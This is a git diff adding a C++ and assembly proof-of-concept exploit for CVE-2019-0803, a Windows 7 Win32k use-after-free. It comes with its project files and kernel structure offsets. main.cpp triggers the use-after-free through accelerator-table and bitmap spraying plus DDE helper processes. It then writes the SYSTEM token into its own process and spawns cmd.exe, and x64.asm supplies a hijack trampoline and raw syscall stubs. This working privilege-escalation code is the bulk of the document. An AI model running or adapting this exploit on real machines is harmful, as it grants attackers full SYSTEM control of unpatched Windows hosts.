+		PHANDLEENTRY phe = gSharedInfo->aheList;
+		for (UINT c = 0; c < gSharedInfo->psi->cHandleEntries; c++)
+		{
+			if ((HACCEL)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hacc)
+			{
+				pacc = (PBYTE)phe[c].phead;
+				break;
+			}
+		}
+		if (pgdiObj == pacc + 0xCB0)
+		{
+			Sleep(1000);
+			return TRUE;
+		}
+	}
+
+	return FALSE;
+}
+
+static VOID xxBuildGlobalAccTableEx(PVOID pcbWndExtra)
+{
+	DWORD num = 0;
+	if (buffFakePal == NULL)
+	{
+		buffFakePal = (PBYTE)malloc(0x98); // PALETTE
+		ZeroMemory(buffFakePal, 0x98);
+		*(PVOID *)(buffFakePal + 0x80) = pcbWndExtra;               //DBI������tagRGBQUAD��ַ�޸�Ϊ��һ������WndExtra�ĵ�ַ
+		*(DWORD *)(buffFakePal + 0x1C) = 1; // PALETTE->cEntries
+		*(PVOID *)(buffFakePal + 0x88) = &num;
+	}
+	if (buffAccTabl == NULL)
+	{
+		buffAccTabl = (LPACCEL)malloc(sizeof(ACCEL) * 132);
+		ZeroMemory(buffAccTabl, sizeof(ACCEL) * 132);
+	}
+
+	for (UINT i = 0; i < 132; i++)
+	{
+        buffAccTabl[i].fVirt = FCONTROL;
+        buffAccTabl[i].key = 0x1234;
+        buffAccTabl[i].cmd = 0x4444;
+	}
+	buffAccTabl[11].key = 2;
+	buffAccTabl[11].cmd = 0;
+	buffAccTabl[12].fVirt = 0;
+	buffAccTabl[12].key = 0;
+
+	*(WORD *)&buffAccTabl[15].key = (WORD)((DWORD_PTR)buffFakePal);
+	*(WORD *)&buffAccTabl[15].cmd = (WORD)((DWORD_PTR)buffFakePal >> 16);
+	*(WORD *)&buffAccTabl[16].fVirt = (WORD)((DWORD_PTR)buffFakePal >> 32);
+	*(WORD *)&buffAccTabl[16].key = (WORD)((DWORD_PTR)buffFakePal >> 48);
+}
+
+INT PocMain2()
+{
+	WCHAR szExePath[MAX_PATH] = { 0 };
+	GetModuleFileNameW(NULL, szExePath, MAX_PATH);
+
+	std::cout << "-------------------" << std::endl;
+	std::cout << "POC - CVE-2019-0803" << std::endl;
+	std::cout << "-------------------" << std::endl;
+
+	DWORD times = 0;
+
+	xxInitExploitInfo();
+	xxCreateIconWindowEx();
+    
+    SetWindowText(hwndIcon2, L"abc");
+
+	BOOL bReturn = FALSE;
+	STARTUPINFO si = { 0 };
+	PROCESS_INFORMATION pi = { 0 };
+
+	si = { 0 };
+	pi = { 0 };
+	si.cb = sizeof(STARTUPINFO);
+	bReturn = CreateProcessW(szExePath,
+		(LPWSTR)L" DDEServer",
+		NULL,
+		NULL,
+		FALSE,
+		NULL,
+		NULL,
+		NULL,
+		&si,
+		&pi);
+	if (!bReturn)
+	{
+		return 0;
+	}
+
+	do
+	{
+		printf("[+]trying %d times \r\n", times);
+		if (xxTriggerExploitEx())
+		{
+            printf("[!]xxTriggerExploitEx Success \r\n");
+			break;
+		}
+		NtUserDestroyWindow(hwndMenu);
+	} while (++times < 10);
+
+	HWND hwndSrever = NULL;
+	do
+	{
+		hwndSrever = FindWindowW(NULL, L"DDEServerPoc");
+	} while (hwndSrever == NULL && (Sleep(300), TRUE));
+
+    //��֮ǰ��ȡ����GDI�������DDEServer������֮�����滻����©��
+	SendMessageW(hwndSrever, MSG_DDESERVER_SET_GDI_OBJ_ADDR, (WPARAM)hgdiObj, NULL);
+
+    //getchar();
+	si = { 0 };
+	pi = { 0 };
+	si.cb = sizeof(STARTUPINFO);
+	bReturn = CreateProcessW(szExePath,
+		(LPWSTR)L" DDEClient",
+		NULL,
+		NULL,
+		FALSE,
+		NULL,
+		NULL,
+		NULL,
+		&si,
+		&pi);
+	if (!bReturn)
+	{
+		return 0;
+	}
+
+	HWND hwnd = NULL;
+
+	do
+	{
+		hwnd = FindWindowW(NULL, L"DDEClientPoc");
+	} while (hwnd == NULL && (Sleep(300), TRUE));
+
+	printf("[+]hTriggerWindow %p\n", hwnd);
+
+	for (UINT i = 0; i < 300; i++)
+	{
+		if (hBitmap[i] != NULL)
+		{
+			DeleteObject(hBitmap[i]);
+			hBitmap[i] = NULL;
+		}
+	}
+
+	xxBuildGlobalAccTableEx(pwndIcon1 + OFFSET_CBWNDEXTRA_WIN7);
+
+	SendMessageW(hwnd, MSG_DDESERVER_EXIT, NULL, NULL);
+	WaitForSingleObject(pi.hProcess, INFINITE);
+
+	for (UINT i = 300; i < 700; i++)
+	{
+		if (hBitmap[i] != NULL)
+		{
+			DeleteObject(hBitmap[i]);
+			hBitmap[i] = NULL;
+		}
+	}
+
+	printf("[+]Wait\n");
+
+	Sleep(8000);
+	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
+
+	HACCEL hAcc[2000] = { NULL };
+	for (UINT i = 0; i < 2000; i++)
+	{
+		hAcc[i] = NtUserCreateAcceleratorTable(buffAccTabl, 132); // UAF
+		if (hAcc[i] == NULL)
+		{
+			break;
+		}
+	}
+
+    RGBQUAD number = {};
+    number.rgbBlue = 0x78;
+    number.rgbGreen = 0x56;
+    number.rgbRed = 0x34;
+
+	if (SetDIBColorTable(hdc, 0, 1, (const RGBQUAD *)&number))
+	{
+        printf("[+]SetDIBColorTable OK\n");
+	}
+
+    if (xxZeroIconWindow2strName())
+    {
+        printf("[+]hTriggerWindow OK\n");
+    }
+    else
+    {
+        printf("[!]hTriggerWindow Failed\n");
+        return 0;
+    }
+
+    FindSecurityTokens();
+    wchar_t strSysSecToken[5] = { 0x00 };
+    strSysSecToken[3] = (SystemSecurityTokenAddr >> 48) & 0xFFFF;
+    strSysSecToken[2] = (SystemSecurityTokenAddr >> 32) & 0xFFFF;
+    strSysSecToken[1] = (SystemSecurityTokenAddr >> 16) & 0xFFFF;
+    strSysSecToken[0] = (SystemSecurityTokenAddr >> 0) & 0xFFFF;
+    printf("[+]Security token to steal: 0x%llx\n", SystemSecurityTokenAddr);
+
+    WriteKernelAddress(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7, strSysSecToken);
+
+    printf("Run Cmd...\n");
+    system("cmd.exe");
+
+	return 0;
+}
+INT DDEServer();
+INT DDEClient();
+INT main(int argc, char *argv[])
+{
+	if (argc == 1)
+	{
+		PocMain2();
+		return 0;
+	}
+
+	if (argc != 2)
+	{
+		return -1;
+	}
+
+	if (strcmp(argv[1], "DDEServer") == 0)
+	{
+		DDEServer();
+	}
+	else if (strcmp(argv[1], "DDEClient") == 0)
+	{
+		DDEClient();
+	}
+
+
+
+	return 0;
+}
diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj
new file mode 100644
index 0000000..81eb996
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj
@@ -0,0 +1,176 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>15.0</VCProjectVersion>
+    <ProjectGuid>{13B512BD-3E32-4787-9C1C-0966899F3608}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>poctest</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="struct.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="DDE.cpp" />
+    <ClCompile Include="main.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <CustomBuild Include="x64.asm">
+      <FileType>Document</FileType>
+      <DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</DeploymentContent>
+      <Command Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> ml64 /Fo $(IntDir)%(fileName).obj /c %(fileName).asm</Command>
+      <Outputs Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(IntDir)%(fileName).obj</Outputs>
+    </CustomBuild>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj.filters b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj.filters
new file mode 100644
index 0000000..e7c7e6d
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj.filters
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="源文件">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="头文件">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="资源文件">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>头文件</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>头文件</Filter>
+    </ClInclude>
+    <ClInclude Include="struct.h">
+      <Filter>头文件</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+    <ClCompile Include="DDE.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+    <ClCompile Include="main.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <CustomBuild Include="x64.asm">
+      <Filter>源文件</Filter>
+    </CustomBuild>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/stdafx.cpp b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/stdafx.cpp
new file mode 100644
index 0000000000000000000000000000000000000000..66fa07ac9228f17b63f97de0a5fb786dfaa9c3c8
GIT binary patch
literal 318
zcmezWPoF`bL4l!|p@boYA(0`Cp@Kn=A(^272o)HtfcRA~Yw(*S_KahJtijqL?Wy1V
zTFNHmfoNU^E}&kJ?gEB<pq_Z38L42C^nfDC3>iQfwwM@yE5DW*V)Ylh*)vQc5qeN<
z%x6eq$O5Ye*#c2tUDF-@&_6!`qz8nR88R92fac~flmgwF3RJCx=I#uj2uwA^Wg!gy
z3@$(n@`*;c0z)uE2$1i{;KmRE^rr_<RM$^5UZeE4U#P!B62tVCGM8x!f=nVo{^R)%
Wb1hE;ub+OJMtDj#NF1UABnJR(Mo6*%

literal 0
HcmV?d00001

diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/stdafx.h b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/stdafx.h
new file mode 100644
index 0000000000000000000000000000000000000000..6d384d09335c7cef1ece40f05f445dd2e8be6c12
GIT binary patch
literal 502
zcmezWPoF`bL4l!|p@boYA(0`Cp@Kn=Ap<C41;p$b#{z%X+^=H|)(&Y;{pQzF24nI3
z=Vjmm>ICT(OVUp}UuO|l@2^qn=FjVA5%(p{GPR`)p`x;AR&<|V<&1Y_2oqqkAR2^~
z844JRfG$X9$OV!L4EYRs49N_sU^$3<CRikgp%m!SRG<napqmqcdeVWs5{5D$Sp;^w
z5*|G^P@iT3%?J6@4r({L*)~8ElY#Oe^YN<-X8`F<0h(71G#kHKkgcGQE&{qW5$I2d
z?YMjgQCSLfM+ut0U||NLA#o7G;LqR!#GqKy2v5moi4=|3DCMr|k7JnL*x6E67I@9i
KBoY*dAUyyixnj})

literal 0
HcmV?d00001

diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/struct.h b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/struct.h
new file mode 100644
index 0000000..7d9da0d
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/struct.h
@@ -0,0 +1,154 @@
+#pragma once
+
+#define DDE_SERVER_APP_NAME		L"MyDDEService"
+#define DDE_SERVER_TOPIC_NAME	L"Topic"
+#define DDE_SERVER_ITEM_NAME	L"Item"
+
+#define DDE_SERVER_WINDOW_CAPTION L"DDEServerPoc"
+#define DDE_CLIENT_WINDOW_CAPTION L"DDEClientPoc"
+
+#define MSG_DDESERVER_EXIT			        WM_USER + 1
+#define MSG_DDESERVER_SET_GDI_OBJ_ADDR	    WM_USER + 2
+
+#define LENGTH_TAGWND 0x128
+#define OFFSET_SPWNDPARENT_WIN7 0x58
+#define OFFSET_STRNAME_WIN7 0xD8
+#define OFFSET_CBWNDEXTRA_WIN7 0xE8
+#define OFFSET_APCADDR_WIN7 0x50
+#define OFFSET_APCEPROCESS_WIN7 0x20
+#define OFFSET_SECTOKEN_WIN7 0x208
+#define OFFSET_EPROCESSPID_WIN7 0x180
+#define OFFSET_EPROCESSBLINK_WIN7 0x188
+
+typedef struct _HANDLEENTRY {
+    PVOID   phead;
+    PVOID   pOwner;
+    BYTE    bType;
+    BYTE    bFlags;
+    WORD    wUniq;
+} HANDLEENTRY, * PHANDLEENTRY;
+
+typedef struct _SERVERINFO {
+    WORD    wRIPFlags;
+    WORD    wSRVIFlags;
+    WORD    wRIPPID;
+    WORD    wRIPError;
+    ULONG   cHandleEntries;
+} SERVERINFO, * PSERVERINFO;
+
+typedef struct _SHAREDINFO {
+    PSERVERINFO  psi;
+    PHANDLEENTRY aheList;
+    ULONG        HeEntrySize;
+} SHAREDINFO, * PSHAREDINFO;
+
+
+typedef struct _LARGE_STRING {
+    ULONG Length;
+    ULONG MaximumLength : 31;
+    ULONG bAnsi : 1;
+    PVOID Buffer;
+} LARGE_STRING, * PLARGE_STRING;
+
+typedef struct _PEB
+{
+    BOOLEAN InheritedAddressSpace;
+    BOOLEAN ReadImageFileExecOptions;
+    BOOLEAN BeingDebugged;
+    union
+    {
+        BOOLEAN BitField;
+        struct
+        {
+            BOOLEAN ImageUsesLargePages : 1;
+            BOOLEAN IsProtectedProcess : 1;
+            BOOLEAN IsLegacyProcess : 1;
+            BOOLEAN IsImageDynamicallyRelocated : 1;
+            BOOLEAN SkipPatchingUser32Forwarders : 1;
+            BOOLEAN SpareBits : 3;
+        };
+    };
+    HANDLE Mutant;
+
+    PVOID ImageBaseAddress;
+    PVOID Ldr;
+    PVOID ProcessParameters;
+    PVOID SubSystemData;
+    PVOID ProcessHeap;
+    PRTL_CRITICAL_SECTION FastPebLock;
+    PVOID AtlThunkSListPtr;
+    PVOID IFEOKey;
+    union
+    {
+        ULONG CrossProcessFlags;
+        struct
+        {
+            ULONG ProcessInJob : 1;
+            ULONG ProcessInitializing : 1;
+            ULONG ProcessUsingVEH : 1;
+            ULONG ProcessUsingVCH : 1;
+            ULONG ProcessUsingFTH : 1;
+            ULONG ReservedBits0 : 27;
+        };
+        ULONG EnvironmentUpdateCount;
+    };
+    union
+    {
+        PVOID KernelCallbackTable;
+        PVOID UserSharedInfoPtr;
+    };
+} PEB, * PPEB;
+
+typedef struct _CLIENT_ID {
+    HANDLE UniqueProcess;
+    HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB
+{
+    NT_TIB NtTib;
+    PVOID EnvironmentPointer;
+    CLIENT_ID ClientId;
+    PVOID ActiveRpcHandle;
+    PVOID ThreadLocalStoragePointer;
+    PPEB ProcessEnvironmentBlock;
+    ULONG LastErrorValue;
+    ULONG CountOfOwnedCriticalSections;
+    PVOID CsrClientThread;
+    PVOID Win32ThreadInfo;
+}TEB, * PTEB;
+
+typedef
+PVOID
+(WINAPI* pfRtlAllocateHeap)(
+    PVOID HeapHandle,
+    ULONG Flags,
+    SIZE_T Size
+    );
+
+extern "C"
+HACCEL
+NtUserCreateAcceleratorTable(
+    LPACCEL Entries,
+    ULONG EntriesCount
+);
+
+extern "C"
+BOOL
+NtUserShowWindow(
+    IN HWND hwnd,
+    IN int nCmdShow
+);
+
+extern "C"
+HDC
+NtUserBeginPaint(
+    IN HWND hwnd,
+    OUT LPPAINTSTRUCT lpPaint
+);
+
+extern "C"
+BOOL
+NtUserDestroyWindow(
+    IN HWND hwnd
+);
\ No newline at end of file
diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/targetver.h b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/targetver.h
new file mode 100644
index 0000000000000000000000000000000000000000..e2da66c055b4ed740ac1cdda9493502afe5573b6
GIT binary patch
literal 370
zcmezWPnn^Bp@<=oA)O%?NGdSoGvqNOGo&)`GH`*hK7&3`lr{KGk^)08gA0Q<5QE4t
zpqe5EJ%$XREL+U1XivZQ!5XD4Wen*zW_c9pq_>nQFoZK?0!>Q+npw_J3{+Pf_aT_c
z0M+EC$T{haomPHN{d|LP>5(rLNSYF-QOaG_AIJ0mdpE>25Yr)ULb!(Ke_0$`49E_M
z%h_TS7~+90@nrC0FlI1<v;7!CfG+Bf-q)R1Z{^q6sh`T2+)@T|A<uuaLcWmRKzx2i
b_(B=%$7F^ahEkwUQ-NmM;0Px>aCia$sR&Y~

literal 0
HcmV?d00001

diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/x64.asm b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/x64.asm
new file mode 100644
index 0000000..4044c5e
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/x64.asm
@@ -0,0 +1,50 @@
+EXTERN  g_ClientCopyDDEIn1_ContinueAddr:DQ;
+EXTERN  g_BitMapAddr:DQ;
+
+.CODE  ;; �����
+
+HijackTrampoFunc PROC
+	push	r8
+	lea		rax,[rsp+50h] 
+	mov		r8,qword ptr g_BitMapAddr
+	mov		qword ptr [rax+30h],r8 
+	mov		r8,qword ptr [rax+20h] 
+	mov		byte ptr [r8+2],2 
+	pop		r8 
+	pop		rax
+	xor		r8d,r8d 
+	mov		r11d,eax 
+	lea		rcx,[rsp+20h]
+	lea     edx,[r8+18h] 
+	jmp		qword ptr g_ClientCopyDDEIn1_ContinueAddr
+HijackTrampoFunc ENDP
+
+NtUserCreateAcceleratorTable PROC
+    mov     r10,rcx
+    mov     eax,10F1h
+    syscall
+    ret
+NtUserCreateAcceleratorTable ENDP
+
+NtUserShowWindow PROC
+    mov     r10,rcx
+    mov     eax,1058h
+    syscall
+    ret
+NtUserShowWindow ENDP
+
+NtUserBeginPaint PROC
+    mov     r10,rcx
+    mov     eax,1017h
+    syscall
+    ret
+NtUserBeginPaint ENDP
+
+NtUserDestroyWindow PROC
+    mov     r10,rcx
+    mov     eax,109dh
+    syscall
+    ret
+NtUserDestroyWindow ENDP
+
+END
\ No newline at end of file
diff --git a/img/46.jpg b/img/46.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..94b15f8daa8a2aea4c75a1d1173ee258bad5806d
GIT binary patch
literal 12300
zcmcI~1yqz>*Y?mTIdn5p(%mIUOLsQ|3=BDdAfSZOA>BwyBRO<QNp~a7kRqWVN__Zy
zKF?de-~ayqxBh$9I_u1wdtGOrx%b}Jj{A20b`604L|#cAfP@49Al-ccw@UySz<mr1
zObqn<n3$MY_wQrjlHudx;NVgdlK{!+X&D*lXz3m>u?cZ8vGB7zpyQV2;TI8;l$2!T
zlvR=uR}_+v6#EH+bRP=~7YCOLAD>E$nT}cP|N6S^1OPFS@Q?#gkmvx&KqM3((rpib
z@=i!(l%L}Mbs?c4qoAW=+$}2M1CUUVQIXKGQPGf5(a?UL2^j?yh(_>$hmcNM)6#7M
zorr{AK*v2WE;p}>n76uyo`LW2F@_eSjCMSepjFVit~Jaf;SP!v>F4#=9zQ2Y$S8LU
zRKPzL{$2zmAOZ3NX%xEKMF2L+-Ht#MAm9<;`?Z`5WS-_&kpV|^7Op?_q4RLf#H`=5
z#+$y_!lq()T)O5giZ>NHRo^h9+(9jF7vk$ooY)UZJ27Z(PlMmEseW>#Jc8EoVZL>Q
zUX6(^CpdmysTBqb+P1Ku!Rw>pLfU@mV<U&M%B5>`ruaZ062YDas&e5tkTXR}w%PPQ
z{wf{yX7WXi9{-B-Xm8@*rt$&;(88fiVFc=)Gnht9)z>Xm0KV@4u__trbvg|~Z(|$#
z2Id+0Aey;!R{rtZ-ljPF`3f5(_UhbELvM=qa(I>V>R^n77=;YwOk#G>M2VCdi~g0i
z*`?aW>eZgMU&h$TeuOsy;^B-7IOB+v6X4gWKHfkT%5^q!J01B#XUZA&$FWRMWt)-d
zm@&fw!oq$(1b0O}u?nIwPM>>%Qj<ZzoA5oL#57i;pFOVaR44?hl=ShynJugVKZH4r
zaC3mk-At~7g<8Vl?GrLaFT3hWwu10&y%VcCSR<Szb4Tb*DB>VCeUNp6_+B=IF?o!G
z^mQcmEb;})O37wH45`RTeL1WF<aLpB@U|4ne?`u+%A`+<fsAosLj45J$J&)zkCO46
zFQf1S;{|oD!X}y9Vor9ygnsiAebQAtp@g$+wbpA1MRP^tq<J4ubd$t^@N6Z`W`B5|
z62+W3HvzSWks90M1#`+}0|WPrwx#8m?843G3@Q_?+L9wo7cifGht4t7P`+Ig)z2-y
z&$LPO>*q&lmdsS|!J(h4M34N3pu(?+WrKv@q>Wy|eZT6O58zZyiedTA_DyT|oeOJ<
